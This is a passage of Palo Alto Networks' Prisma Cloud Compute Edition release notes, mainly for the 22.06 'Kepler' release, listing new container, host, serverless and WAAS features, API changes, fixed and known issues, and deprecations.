off and the value can now be a whole number greater than or equal to 1. - Fixed an issue where a Defender scanning a non-docker (CRI-O) registry incorrectly reported all custom compliance checks as passed. - Fixed error that overwrote the communication port after upgrading a Defender with a custom port from the Prisma Cloud Console UI. - Fixed an issue that showed different fixes for the same CVE on a single image. Each CVE vulnerability is consolidated and grouped according to OS version for each image and package. - Fixed issue with missing runc path in TKGI with containerd. Specify a custom container runtime socket path when deploying Defenders on TKGI with containerd. - Fixed issue with the scanned images filter. With this fix, the filter lists all the tags when multiple images have the same digest. - Fixed an issue of duplicate or missing system rules for WAAS. Prisma Cloud Compute Edition Release Information - Fixed an issue of unprotected web apps and APIs missing from the report (Monitor > WAAS > Unprotected Web Apps and APIs). - Fixed an issue where XSS is not detected due to query key/value parsing. Known Issues - Defenders are not accepting the self-signed proxy certificate configured for TLS intercept proxies. **Workaround:** Ensure the following conditions are met to workaround the issue. - Your proxy trusts the Prisma Cloud Console Certificate Authority (CA). - Your proxy uses the client certificate of the Defender when the proxy sends requests from the Defender to the console. - You obtained the certificates of the Defender and the Prisma Cloud Console CA. Use the `/api/v1/certs/server-certs.sh` API to obtain the needed files: - The client key of the Defender: `defender-client-key.pem` - The client certificate of the Defender: `defender-client-cert.pem` - The Prisma Cloud Console CA certificate: `ca.pem` - You obtained the password for the client key of the Defender using the `api/v1/certs/service-parameter` API. End of Support Notifications - Debian 9 (Stretch) has reached End of Life (EOL), and users of Debian 9 will not receive any CVE security vulnerabilities from the Intel **ligence Stream feed associated with this OS version.** 22.06 Release Notes The following table outlines the release particulars: <p>| | |</p> <table> <thead> <tr> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td>Build</td> <td>22.06.179</td> </tr> <tr> <td>Code name</td> <td>Kepler</td> </tr> <tr> <td>Release date</td> <td>June 09, 2022</td> </tr> <tr> <td>Type</td> <td>Major release</td> </tr> <tr> <td>SHA-256 Digest</td> <td>349505f80b50468eb1eab2448a57b43b578bcd57d780b459ea1d6d00803a1091</td> </tr> </tbody> </table> - **CVE Coverage Update** - **New Features in the Core Platform** - **New Features in Container Security** - **New Features in Agentless Security** - **New Features in Host Security** - **New features in Serverless Security** - **New Features in WAAS** - **DISA STIG Scan Findings and Justifications** - **API Changes** - **Addressed Issues** - **Changes in Existing Behavior** - **End of Support Notifications** - **Supported Operating Systems** - **Known Issues** - **Deprecation Notifications** - **Backward Compatibility for New Features** **CVE Coverage Update** As part of the 22.06 release, Prisma Cloud has rolled out updates to its vulnerability data for Common Vulnerabilities and Exposures (CVEs) in the Intelligence Stream. The new additions are as follows: - Support for Github Security Advisories vulnerabilities including Go, Java, and Python vulnerabilities. - Increase of 152% new PRISMA-IDs since the Joule major release. • Faster addition of CVEs (pre-filled CVEs). The pre-filled CVEs were added to the Intelligence Stream on an average of 56 days before they were analyzed in the NVD. As an example, the SpringShell CVE (CVE-2022-22965) was published on March 31, 2022, and the NVD analysis was completed on April 8, 2022. ‘PRISMA-2022-0130’ was published for the vulnerability on March 30, 2022, and was changed to the CVE as soon as it was published in the NVD. New Features in the Core Platform In addition to familiarizing yourself with the new features and enhancements in this release, review the minimum System Requirements for versions that are tested and supported on 22.06. To download the Prisma Cloud Compute Edition release tarball from the Palo Alto Networks Customer Support Portal (CSP): 2. Go to Updates > Software Updates and select Prisma Cloud Compute Edition. New Filters in the Vulnerability Explorer On the Vulnerability Explorer, you can now generate a vulnerabilities report using new filters such as CVSS score and severity threshold. In addition to viewing the filtered results for deployed images, registry images, hosts, and functions under Vulnerability (CVE) results, on Monitor > Vulnerabilities > Vulnerability Explorer, you can also download a detailed report for CVEs in a CSV format or a detailed report for impacted resources in a CSV format from the Vulnerability Explorer. Vulnerability Scan Report for Registry Images With the vulnerabilities report for registry images (Monitor > Vulnerabilities > Images > Registries), you can review the top 10 critical CVEs discovered in your registry images and search by a CVE ID to view the results for both registry and deployed images that are impacted by a CVE. ARM64 Architecture Support You can now deploy Defenders to protect AWS workloads based on the Linux ARM64 architecture. With ARM64 support, you can secure your deployments and enhance the cost savings for compute and network-intensive workloads that use cloud-native compute offerings such as the AWS Graviton processor. To use Prisma Cloud on ARM64 architecture, see the system requirements. Compliance Alert Triggers for Slack You can now trigger and send vulnerabilities detected for container and image compliance, and host compliance to your Slack integration. Learn how to configure these new triggers for Slack alerts. Integrate with Azure Active Directory Using SAML 2.0 Prisma Cloud Compute now uses the Microsoft Graph API for integrating with Azure Active Directory (AD) resources. This transition is inline with the deprecation notice from Microsoft of the Azure AD Graph API and the Azure Active Directory Authentication Library (ADAL). For authenticating users on the Prisma Cloud Console, you must replace the Directory.Read.All permission for Azure Active Directory Graph with the Directory.Read.All permission for the Microsoft Graph API. For the correct permissions to use Azure AD with SAML 2.0, see correct permissions. OIDC User Identity Mapping You can map OIDC identities to Prisma Cloud users as required by the specification. Instead of using the default sub attribute, you can now use several more friendly attributes like email or username. Improvements in Runtime Protection The container model learning is improved to reduce false positive audits when a binary is modified during container creation. The grace time for binaries added after the container has started is now at 10 seconds. Additionally, for CI/CD environments where dedicated containers are used to pull images, you can now allow pulling images. For example, if a container was started with podman as one of its startup processes, the Dockerfile will allow this action and ignore runtime audits. Enhanced Coverage for Certificate Authentication with Azure You can now authenticate with Azure using a certificate for the following integrations: - Cloud discovery - Azure Key Vault - ACR registry scanning - Azure serverless function scanning - Azure VM image scanning GKE Autopilot Deployment Improvement When deploying Defenders into your Kubernetes deployment for GKE Autopilot, you have a new toggle in the console and a corresponding twistcli flag that makes the workflow easier. The improvements automatically remove the mounts that are not relevant to the Autopilot deployment and enable you to add the annotation required to deploy Defenders successfully. On the console, Manage>Defenders>Deploy>Defenders, select Kubernetes and enable the Nodes use Container Runtime Interface (CRI), not Docker and GKE Autopilot deployment. The --gke-autopilot flag in twistcli adds the annotation to the YAML file or Helm chart. For example, ./twistcli defender export kubernetes --gke-autopilot --cri --cluster-address <console address> --address https://<console address>:8083 New Features in Container Security Vulnerability and Compliance Scanning for Workloads Protected by App-Embedded Defenders App-Embedded Defenders can now scan the workloads they protect for vulnerabilities and compliance issues. They can also collect and report package information and metadata about the cloud environments in which they run. Go to Monitor > Vulnerabilities > Images > Deployed and Monitor > Compliance > Images > Deployed to review the scan reports. Improved Visibility for CaaS Workloads Protected by App-Embedded Defenders For CaaS (Container as a Service) workloads protected by the App-Embedded Defenders, you can now view more metadata on the cloud environment on which it is deployed, forensics, and runtime audits on the Monitor > Runtime > App-Embedded observations page. You can filter the workloads in the table by a number of facets, including collections, account ID, and clusters. Runtime File System Audits for App-Embedded Defenders App-Embedded Defender runtime defense now includes support for container file systems so that you can continuously monitor and protect containers from suspicious file system activities and malware. Automatically Extract Fargate Task Entrypoint at Embed-Time To streamline the embed flow and eliminate manual intervention (that is, updating task definitions to explicitly specify entrypoints), Prisma Cloud can automatically find the image entrypoint and set it up in the protected task definition. Now, when Prisma Cloud generates a protected task definition, it knows the entrypoint and/or cmd instructions of the container image during the first run of the App-Embedded Defender. CloudFormation Template (CFT) Support for Fargate Task Definitions You can now generate protected Fargate task definitions in the CFT format for embedding an App-Embedded Defender. In 22.06, we've added support for more checks from the CIS OpenShift benchmark. For more information, see CIS Benchmarks. Support for Vulnerability and Compliance Scanning for Windows Containers Windows Container Defender on hosts with the containerd runtime can now scan Windows containers for vulnerabilities and compliance issues. This is supported on AKS only. In addition, deployed Windows Container Defenders can now be configured to scan Windows images in registries. twistcli for Windows has also been extended to scan Windows images on Windows hosts with containerd installed. Support for Google Artifact Registry You can now scan Google Artifact Registries using Prisma Cloud Compute. ### Registry Scanning Enhancements Enhanced registry scanning progress status within the Prisma Cloud Console UI and logs. The enhancements provide the option to choose whether to stop or continue an in-progress scan when saving the registry settings. After you configure registry scanning, Prisma Cloud automatically scans the images within for vulnerabilities using an improved flow. ### Scan Image Tar Files with twistcli `twistcli` can scan image tarballs for the Docker Image Specification v1.1 and later. This enhancement enables support for vendors who deliver container images as tar files, not via a registry, and the integration with Kaniko, a tool that builds images in a Kubernetes cluster from a Dockerfile without access to a Docker daemon. Rule to Allow Activity in Attached Sessions When you start a session inside pods or containers running in your deployment using commands such as kubectl exec or docker exec, you can now explicitly specify whether the rule should allow the activity in attached sessions. This option on Defend Runtime Container Policy > Add rule > Processes helps you reduce the volume of alerts generated for the allowed activities and processes. When enabled, process, network, and filesystem activity executed in an attached session such as kubectl exec, is explicitly allowed without additional runtime analysis. Only Defender versions 22.06 or later will support this capability. New Features in Agentless Security Support for Microsoft Azure Agentless scanning is now available for vulnerability scanning and compliance scanning on Azure. To configure and onboard agentless scanning on Azure, see configure agentless scanning. Support for Google Cloud Agentless scanning is now available for vulnerability scanning and compliance scanning on Google Cloud. To configure and onboard agentless scanning on Google Cloud, see configure agentless scanning. Compliance and Custom Compliance Support With agentless scanning you can now scan hosts from all three major cloud providers—AWS, Azure, and Google Cloud—against compliance benchmarks. In addition to out-of-the-box checks, you can apply user defined custom compliance checks and scan against the host file system. Unpatched OS Detection In addition to vulnerabilities and compliance scanning, you can now track pending OS security updates in this release with agentless scanning. Unscanned Cloud Account Detection You can now easily discover regions within AWS, Azure, or Google Cloud accounts where agentless scanning is not enabled, and enable scanning for those cloud accounts. Proxy Support In this release, you can manage how scanners connect to the Prisma Cloud Console for agentless scanning. If you use a proxy, you can configure the proxy configuration in the scan settings for accounts under Manage > Cloud Accounts. New Features in Host Security Auto-Defend Host Process Update When you set up the process to automatically deploy Defenders on hosts, this update ensures that Host Defenders are not deployed on container hosts. Hosts running containers require Container Defenders to protect and secure both the host and the containers on it. Learn about the deployment process for auto-defend hosts. CIS Linux Benchmark Update The CIS Linux Benchmark now includes 13 additional checks. You can find the additional controls in the Defend > Compliance > Hosts > CIS Linux template. New Features in Serverless Security Runtime Protection for Azure Functions Serverless Defenders now offer runtime protection for Azure Functions. Functions implemented in C# (.NET Core) 3.1 and 6.0 are supported. New features in Web Application and API Security (WAAS) **WAAS Out of Band Detection** Out of band is a new mode for deploying Web Application and API Security (WAAS). It enables you to inspect HTTP messages to an application based on a mirror of the traffic, without the need for setting up WAAS as an inline proxy, so that you can receive alerts on malicious requests such as OWASP top alerts, bot traffic, and API events. It provides you with API discovery and alerting without impacting the flow, availability, or response time of the protected web application. Out of band detection also allows you to extend your WAAS approach: - You can monitor your resources deployed on AWS with VPC traffic mirroring from workloads. This option gives you the flexibility to monitor environments without deploying Defenders. - If you have deployed Defenders in your environment, but are not using the WAAS capabilities on Compute, you can mirror traffic for an out of band inspection without requiring any additional configuration. After you configure a custom rule for out of band mode (Defend > WAAS > Out of band), all the detections are applied on a read-only copy of the traffic. And you can view the out of band traffic details on Monitor > WAAS > API observations > Out of band observations. OpenAPI Definition File Scanning You can scan OpenAPI 2.X and 3.X definition files in either YAML or JSON formats, and generate a report for any errors or shortcomings such as structural issues, gaps in adherence to security guidelines and best practices. You can initiate a scan through twistcli, upload a file to the Console, or import a definition file into a WAAS app. The scan reports are available under Monitor > WAAS > API definition scan. Automatic Port Detection of WAAS Applications for Containers or Hosts When you enable the automatic detection of ports in WAAS Container, Host, or Out of band rules, you can secure ports used by unprotected web applications. The automatic detection of ports makes it easier to deploy WAAS at scale because you can protect web applications without the knowledge of which ports are used. Additionally, you can add specific ports to the protected HTTP endpoints within each app in your deployment. Customization of Response Headers You can append or override names and values in HTTP response headers for Containers, Hosts, and App Embedded deployments that are sent from WAAS protected applications. WAAS Actions for HTTP Messages that Exceed Body Inspection Limits You can now apply the Alert, Prevent, or Ban WAAS actions for HTTP messages that exceed the body inspection limit and ensure that messages that exceed the inspection limit are not forwarded to the protected application. To enforce these limitations, you must have a minimum Defender version of 22.01 (Joule). And with custom rules (Defend > WAAS > Out of band), you can apply Disable or Alert actions for HTTP messages that exceed the body inspection limit. HTTP body inspection On HTTP body inspection size limit (in bytes) 131072 ⚠️ Increasing body inspection limit may have an adverse effect on performance and memory consumption. HTTP body inspection limit exceeded Disable Alert Prevent Ban Attacker IP Addition to a Network List When a WAAS event includes an attacker IP address, you can now directly click a link to add the attacker IP address to an existing or new network list from Monitor > Events > Aggregated WAAS events > Attacker. ### WAAS Events <table> <thead> <tr> <th>Alert</th> </tr> </thead> <tbody> <tr> <td>1</td> </tr> </tbody> </table> <table> <thead> <tr> <th>waas-container</th> </tr> </thead> <tbody> <tr> <td>Denied IP</td> </tr> </tbody> </table> 2c4ac4b2da5014361dffa029e3047838942b0db189d01176ea... /k8s_dvwa_dvwa_dvwa_5a666e45-5914-4583-bced-95c862d6... infoslack/dvwa:latest qa-ruby-env1 <table> <thead> <tr> <th>User-agent</th> <th>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36</th> </tr> </thead> <tbody> <tr> <td>Host</td> <td>34.72.32.31:9001</td> </tr> <tr> <td>Url (Show decoded)</td> <td>34.72.32.31:9001/phpinfo.php</td> </tr> <tr> <td>Path</td> <td>/phpinfo.php</td> </tr> <tr> <td>Header names</td> <td>Accept, Accept-Encoding, Accept-Language, Accept-Version, Aadfs-Client-request-id, Authorization, Cache-Control</td> </tr> <tr> <td>Response header</td> <td>Cache-Control, Content-Type, Date, Expires</td> </tr> <tr> <td>Status code</td> <td>200</td> </tr> </tbody> </table> ### Attacker 31.154.166.148 matched a denied subnet address 31.154.166.148 <table> <thead> <tr> <th>Source IP</th> <th>31.154.166.148</th> </tr> </thead> <tbody> <tr> <td>Source country</td> <td>IL</td> </tr> </tbody> </table> Regex Match in Forensics Message When defining a custom rule, you can now define a regular expression to match for strings and include the matched information in the forensics message. ``` Attack using HTTP %req.http_version matching on the following payload: %regexMatches ``` Defender Compatibility with Custom Rules To make it easier to review and make sure that all Defenders meet the minimum version requirement for a rule, you can now view the minimum Defender version required to use each rule. The Defender version information is displayed in a new column within the custom rules table. WAAS Proxy Error Statistics On Radar > WAAS connectivity monitor you can view WAAS proxy statistics for blocked requests, count of requests when the inspection limit was exceeded, and parsing errors. DISA STIG Scan Findings and Justifications Every release, we perform an SCAP scan of the Prisma Cloud Compute Console and Defender images. The process is based upon the U.S. Air Force’s Platform 1 "Repo One" OpenSCAP scan of the Prisma Cloud Compute images. We compare our scan results to IronBank’s latest approved UBI8-minimal scan findings. Any discrepancies are addressed or justified. API Changes GET /stats/vulnerabilities Introduces a change in the existing API endpoint that fetches the vulnerabilities (CVEs) affecting an environment. The data for each CVE, such as impacted packages, highest severity, and so on, is now based on the entire environment irrespective of the collections filter, assigned collections, or assigned accounts. Also, the impacted resources and distribution counts are not retrieved and are returned as zero when you apply filters or are assigned with specific collections or accounts. One more change in this API endpoint is that the value of the status field will now be empty. In the context of a CVE, there can be multiple fix statuses, depending on the impacted package. Therefore, providing a fix status per CVE is incorrect and was removed. To get the right fix status according to the package, use additional endpoint to fetch the resources impacted by the CVE and their details. GET /stats/vulnerabilities/impacted-resources Introduces new optional query parameters such as pagination and resource type to the existing API endpoint. To enable backward compatibility, if you don’t use these optional query parameters, the API response will display results without pagination and registry images, and similar to the response in the previous releases (Joule or earlier). Note: Make sure to update your scripts before the Newton release. Starting with the Newton release, the API response will no longer support requests without the pagination and resource type query parameters. GET /stats/vulnerabilities/download Introduces a new API endpoint that downloads a detailed report for CVEs in a CSV format. GET /stats/vulnerabilities/impacted-resources/download Introduces a new API endpoint that downloads a detailed report for impacted resources in a CSV format. PUT policies/firewall/app/out-of-band Introduces a new API endpoint that updates or edits a WAAS custom rule for out of band traffic. GET policies/firewall/app/out-of-band Introduces a new API endpoint that discovers and detects the HTTP traffic for an existing WAAS out of band custom rule. GET policies/firewall/app/out-of-band/impacted Introduces a new API endpoint that fetches the impacted resources list for an existing WAAS out of band custom rule. POST waas/openapi-scans Introduces a new API endpoint that scans the API definition files and generates a report for any errors, or shortcomings such as structural issues, compromised security, best practices, and so on. API definition scan supports scanning OpenAPI 2.X and 3.X definition files in either YAML or JSON formats. GET profiles/app-embedded Introduces a new API endpoint that fetches the app-embedded runtime metadata. GET profiles/app-embedded/download Introduces a new API endpoint that downloads the app-embedded runtime profiles in a CSV format. GET util/arm64/twistcli Introduces a new API endpoint that downloads an x64 bit Linux ARM architecture twistcli in a ZIP format. Addressed Issues - Fixed an issue where fixedDate for Windows vulnerabilities did not update. - The Intelligence Stream is updated to fix an issue where some Red Hat Enterprise Linux (RHEL) packages were incorrectly reported as vulnerable. This issue occurred because Red Hat had duplicate records of the same CVE in their OVAL feed, where one was fixed and the other one was not. • Security Fixes In accordance with the security assurance policy, this release contains updates to resolve older vulnerabilities in packaged dependencies: **Console & Defender:** • Upgraded Go Lang version • Removed mongodb-tools binaries • Containerd updates for Kubernetes (github.com/containerd/containerd) • Open Policy Agent updates (github.com/open-policy-agent/opa) • Runc updates (github.com/opencontainers/runc) • Kubernetes (k8s.io/kubernetes) • Mongod • Mongodb Go driver (go.mongodb.org/mongo-driver) • AWS SDK for Go (github.com/aws/aws-sdk-go) • Dependency updates for: • Package xz (github.com/ulikunitz/xz) • YAML for Go package (gopkg.in/yaml.v3) **Defender** • github.com/docker/distribution • github.com/tidwall/gjson **Console** • Dependency updates for com.google.code.gson.gson --- **End of Support Notifications** The following list of items are no longer supported in 22.06. - With the RedHat EOL announcement for OpenShift 3.11, Prisma Cloud no longer supports Openshift 3.11. **Supported Host Operating Systems** Prisma Cloud now supports hosts running x86 architecture on multiple platforms and hosts running ARM64 architecture on AWS. Review the full system requirements for all supported operating systems. **x86 Architecture** In this release, Prisma Cloud added support for the following host operating systems on x86 architecture: - Bottlerocket OS 1.7 - Latest Amazon Linux 2 - Latest Container-Optimized OS on Google Cloud - Ubuntu 22.04 LTS ARM64 In this release, Prisma Cloud added support for the following host operating systems on ARM64 architecture running on AWS: - Amazon Linux 2 - Ubuntu 18.04 LTS - Debian 10 - RHEL 8.4 - CentOS 8 - Photon OS 4 Changes in Existing Behavior - For short-lived containers, that is when a container is created and immediately terminated, the image will not be scanned. In previous versions, the image was scanned by monitoring pull events from the registry. - An additional permission is added to AWS agentless scanning template. - For existing accounts that are enabled for agentless scans you will need to update the permissions. - Credentials for AWS, GCP, and Azure cloud accounts are now under Manage > Cloud Accounts. - In 22.01 update 2, we updated how the scanning process impacts artifact metadata in JFrog Artifactory. The scanning process no longer updates the Last Downloaded date for all manifest files of all the images in the registry. - In 22.06, we've further refined how this works: - As part of the process for evaluating which images should be scanned, in addition to reviewing the manifest files, Prisma Cloud also examines the actual images. Now the Last Downloaded date won't change unless the image is actually pulled and scanned. - "Transparent security tool scanning" is not supported for anything other than Local repositories. If you select anything other than Local in your scan configuration (including virtual repositories backed by local repositories), then Prisma Cloud automatically uses the Docker API to scan all repositories (local, remote, and virtual). When using Docker APIs, the Last Downloaded field in local JFrog Artifactory registries will be impacted by scanning. - If you've got a mix of local, remote, and virtual repositories, and you want to ensure that the Last Downloaded date isn't impacted by Prisma Cloud scanning, then create separate scan configurations for local repositories and remote/virtual repositories. • The data collection for incidents in the Prisma Cloud Compute database is capped to 25,000 incidents or 50 MB, whichever limit is reached first. When upgrading from 22.01 to 22.06, if the size of your incident collection exceeds this limit, then the oldest incidents that exceed the limit will be dropped. As part of this change, the serial number field for incidents will now be empty. The serial number was a running count of the incidents according to the size of the data collection. Now that the collection is capped, the serial number is no longer available. To uniquely identify incidents, use the ID field instead. • A new field **category** is now available for incidents alert integration with Webhook and Splunk to identify the incident type. • With 22.06, all App-Embedded collections including Fargate tasks, will be grouped together in collections using the **App ID** field. Until now, collections of Fargate tasks were specified using the **Hosts** field in vulnerability, compliance, and incidents pages. After upgrading to 22.06, update your existing collections to use the **App IDs** field rather than the **Hosts** field to maintain the correct grouping of resources for filtering, assigning permissions, and scoping vulnerability and compliance policies. Also, the CSV file export for vulnerability scan results, compliance scan results, and incidents has changed. Fargate tasks protected by App-Embedded Defender will be reported under the **Apps** column instead of the **Hosts** column. **Known Issues** • The `--tarball` option in twistcli does not scan for compliance checks. Currently, only vulnerabilities are detected successfully. • When Defender is installed on Windows hosts in AWS, and Prisma Cloud Compute Cloud Discovery is configured to scan your environment for protected hosts, the Windows hosts running Defender are reported as unprotected. • For custom compliance checks for Kubernetes and OpenShift on CRIO, when **Reported results** is configured to show both passed and failed checks, if a check doesn’t run, Prisma Cloud still reports it as **passed**. • If you have the same custom compliance rule in use in a host policy (effect: alert) and a container policy (effect: block), the rules will enforce your policy (as expected), but the audit message for a blocked container will incorrectly refer to the host policy and host rule name. • On the Radar > Containers, K3s clusters are not displayed. You can view the containers within these clusters under **Non-cluster containers**. **Upcoming Deprecation Notifications** • Support for Windows Server 2022 will be added with or before the next release, Lagrange. With support for Windows Server 2022, Windows Server 2016 will no longer be supported. Microsoft has announced the **EOL for Windows Server 2016** as of January, 2022. Prisma Cloud Compute Edition Release Information - Support for Docker Access Control is being deprecated along with the Access User role. Support will be removed in the Newton release. - Support for scanning your code repositories from the Prisma Cloud Compute console (Monitor > Vulnerabilities > Code repositories) is being deprecated. Twistcli for code repository scanning is also being deprecated. You can use the Code Security module on Prisma Cloud to scan code repositories and CI pipelines for misconfigurations and vulnerabilities. Support for code repo scanning using Prisma Cloud Compute will be removed in the Newton release. Backward Compatibility for New Features <table> <thead> <tr> <th>Feature name</th> <th>Unsupported Component (Defender/twistcli)</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>Support for Google Artifact Registry</td> <td>Defender</td> <td>Old defenders will not be supported for scanning Artifact Registry.</td> </tr> <tr> <td>Registry Scan Enhancements</td> <td>Defender</td> <td>A new log record was added for Defender finished scanning image, which adds pull, analysis and total duration. For older defenders, the following fields will be zero: ImagePullDuration, ImageAnalysisDuration, ImageScanDuration.</td> </tr> <tr> <td>Vulnerability and compliance for Workloads Protected by App-Embedded Defenders</td> <td>Defender</td> <td>Old app-embedded Defenders (except for ECS Fargate Defenders) will not be supported for vulnerabilities, compliance, and package info. The images running with these Defenders will not be returned in the GET images API. Also, for old ECS Fargate Defenders, the Environment → Apps tab within the image dialog will be empty, even though there are running tasks and their count is displayed on the main images page under the Apps column.</td> </tr> <tr> <td>Feature name</td> <td>Unsupported Component (Defender/twistcli)</td> <td>Details</td> </tr> <tr> <td>------------------------------------------------------------------------------</td> <td>------------------------------------------</td> <td>------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</td> </tr> <tr> <td>Runtime File System Audits for App-Embedded Defenders</td> <td>Defender</td> <td>Old app-embedded Defenders will not be able to have the filesystem capability, so the workloads protected by them can not be monitored for FS.</td> </tr> <tr> <td>Rule to Allow Activity in Attached Sessions</td> <td>Defenders</td> <td>Old Defenders will not support the new functionality as they don't have the backend implementation part of this toggle</td> </tr> <tr> <td>Support ARM: Add vulnerabilities support for ARM to the IS ARM support</td> <td>Defenders, twistcli, Console and Intelligence Stream</td> <td>Old defenders and consoles won't support ARM64 since there isn't any the dedicated implementation. The Intelligence Stream is updated with ARM64 CVEs for all consoles, but as we predict, it won't be common to get an ARM related CVE for each x86 CVE. ARM64 Defenders are required to scan ARM-based images. Make sure to assign the appropriate collections in your Registry Scanning Scope for x86_64 images and ARM64 images to prevent errors in the registry scanning. The ALL collection automatically includes the ARM64 Defenders.</td> </tr> <tr> <td>Windows defender for Vulnerability and Compliance with Containers</td> <td>Defenders, twistcli</td> <td>Old Defenders and twistcli will not support the new functionality as they don't have the updated implementation</td> </tr> <tr> <td>Improved Visibility for CaaS workloads protected by App-Embedded Defenders</td> <td>Defenders</td> <td>Old App-Embedded Defenders will not be supported, the new capability of fetching the workload cloud metadata to App-Embedded profile</td> </tr> <tr> <td>Feature name</td> <td>Unsupported Component (Defender/twistcli)</td> <td>Details</td> </tr> <tr> <td>----------------------------------------------------------------------------</td> <td>------------------------------------------</td> <td>----------------------------------------------------------------------------------------------------------------------------------------</td> </tr> <tr> <td>Authenticate with Azure Container Registry using certificate</td> <td>Defenders</td> <td>We will have a problem with using the new credential in scanning with older defenders, they will not be able to use this credential.</td> </tr> <tr> <td>Extract Fargate task Entrypoint and Command Params, Support Fargate Task Definition in CloudFormation Template format #33033</td> <td>twistcli</td> <td>New implementation for Fargate Task defenders in twistcli.</td> </tr> <tr> <td>Support image tar files scanning with twistcli</td> <td>twistcli</td> <td>Old twistcli version doesn't have this implementation.</td> </tr> <tr> <td>Support for Azure VMs and Containers being reported into SaaS - Unified Inventory (#tbd)</td> <td>Defender</td> <td>Older than Kepler Defenders will not be able to report on Azure VMs, due to the lack of the VM Id in proper format support. It will need users to upgrade their defenders to Kepler.</td> </tr> </tbody> </table> Get Help The following topics provide information on where to find more about this release and how to request support: - Related Documentation - Request Support Related Documentation Refer to the following documentation on the Technical Documentation portal or search the documentation for more information on our products: • **Prisma Cloud Administrator’s Guide (Compute)** — Provides the concepts and workflows to get the most out of the Compute service in Prisma Cloud Enterprise Edition. The Prisma Cloud Administrator’s Guide (Compute) also takes you through the initial onboarding and basic set up for securing your hosts, containers, and serverless functions. • **Prisma Cloud Compute Edition Administrator’s Guide** — Provides the concepts and workflows to get the most out of the Prisma Cloud Compute Edition, the self-hosted version of Prisma Cloud’s workload protection solution. The Prisma Cloud Administrator’s Guide (Compute) also takes you through the initial onboarding and basic set up for securing your hosts, containers, and serverless functions.* • **Prisma Cloud Administrator’s Guide** — Provides the concepts and workflows to get the most out of the Prisma Cloud service. The Prisma Cloud Administrator’s Guide also takes you through the initial onboarding and basic set up for securing your public cloud deployments. • **Prisma Cloud RQL Reference** — Describes how to use the Resource Query Language (RQL) to investigate incidents and then create policies based on the findings. • **Prisma Cloud Code Security Administrator’s Guide** — Use the Code Security Guide to scan and secure your Iac templates and identify misconfiguration before you go from code to cloud. Request Support For contacting support, for information on support programs, to manage your account, or to open a support case, go to the Prisma Cloud LIVE community page. To provide feedback on the documentation, please write to us at: documentation@paloaltonetworks.com. Contact Information Corporate Headquarters: Palo Alto Networks 3000 Tannery Way Santa Clara, CA 95054 https://www.paloaltonetworks.com/company/contact-support Palo Alto Networks, Inc. www.paloaltonetworks.com
{"Source-Url": "https://docs.prismacloud.io/en/enterprise-edition/assets/pdf/prisma-cloud-compute-edition-release-notes-22-06.pdf", "len_cl100k_base": 12495, "olmocr-version": "0.1.53", "pdf-total-pages": 56, "total-fallback-pages": 0, "total-input-tokens": 88962, "total-output-tokens": 14226, "length": "2e13", "weborganizer": {"__label__adult": 0.0005168914794921875, "__label__art_design": 0.0007910728454589844, "__label__crime_law": 0.0021762847900390625, "__label__education_jobs": 0.000950336456298828, "__label__entertainment": 0.00020563602447509768, "__label__fashion_beauty": 0.0002155303955078125, "__label__finance_business": 0.0016851425170898438, "__label__food_dining": 0.00023615360260009768, "__label__games": 0.0014781951904296875, "__label__hardware": 0.00238800048828125, "__label__health": 0.0003228187561035156, "__label__history": 0.0004935264587402344, "__label__home_hobbies": 0.0001474618911743164, "__label__industrial": 0.000797271728515625, "__label__literature": 0.0003490447998046875, "__label__politics": 0.0005698204040527344, "__label__religion": 0.00046634674072265625, "__label__science_tech": 0.06927490234375, "__label__social_life": 0.00020766258239746096, "__label__software": 0.25048828125, "__label__software_dev": 0.66552734375, "__label__sports_fitness": 0.0002505779266357422, "__label__transportation": 0.0003345012664794922, "__label__travel": 0.00025653839111328125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 55552, 0.04088]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 55552, 0.01362]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 55552, 0.84343]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 0, null], [0, 3279, false], [3279, 3699, null], [3699, 4280, null], [4280, 5269, null], [5269, 5847, null], [5847, 6365, null], [6365, 7344, null], [7344, 9113, null], [9113, 9189, null], [9189, 11152, null], [11152, 13430, null], [13430, 14254, null], [14254, 14728, null], [14728, 16986, null], [16986, 18325, null], [18325, 19628, null], [19628, 21090, null], [21090, 21424, null], [21424, 22673, null], [22673, 24981, null], [24981, 25426, null], [25426, 25679, null], [25679, 26165, null], [26165, 26347, null], [26347, 26470, null], [26470, 27048, null], [27048, 27809, null], [27809, 28479, null], [28479, 28955, null], [28955, 29270, null], [29270, 29437, null], [29437, 29639, null], [29639, 29886, null], [29886, 30671, null], [30671, 31492, null], [31492, 32418, null], [32418, 32914, null], [32914, 33646, null], [33646, 36101, null], [36101, 36700, null], [36700, 36901, null], [36901, 39412, null], [39412, 40665, null], [40665, 42130, null], [42130, 44182, null], [44182, 47024, null], [47024, 49103, null], [49103, 51700, null], [51700, 53367, null], [53367, 53367, null], [53367, 53530, null], [53530, 55066, null], [55066, 55552, null], [55552, 55552, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 0, null], [0, 3279, true], [3279, 3699, null], [3699, 4280, null], [4280, 5269, null], [5269, 5847, null], [5847, 6365, null], [6365, 7344, null], [7344, 9113, null], [9113, 9189, null], [9189, 11152, null], [11152, 13430, null], [13430, 14254, null], [14254, 14728, null], [14728, 16986, null], [16986, 18325, null], [18325, 19628, null], [19628, 21090, null], [21090, 21424, null], [21424, 22673, null], [22673, 24981, null], [24981, 25426, null], [25426, 25679, null], [25679, 26165, null], [26165, 26347, null], [26347, 26470, null], [26470, 27048, null], [27048, 27809, null], [27809, 28479, null], [28479, 28955, null], [28955, 29270, null], [29270, 29437, null], [29437, 29639, null], [29639, 29886, null], [29886, 30671, null], [30671, 31492, null], [31492, 32418, null], [32418, 32914, null], [32914, 33646, null], [33646, 36101, null], [36101, 36700, null], [36700, 36901, null], [36901, 39412, null], [39412, 40665, null], [40665, 42130, null], [42130, 44182, null], [44182, 47024, null], [47024, 49103, null], [49103, 51700, null], [51700, 53367, null], [53367, 53367, null], [53367, 53530, null], [53530, 55066, 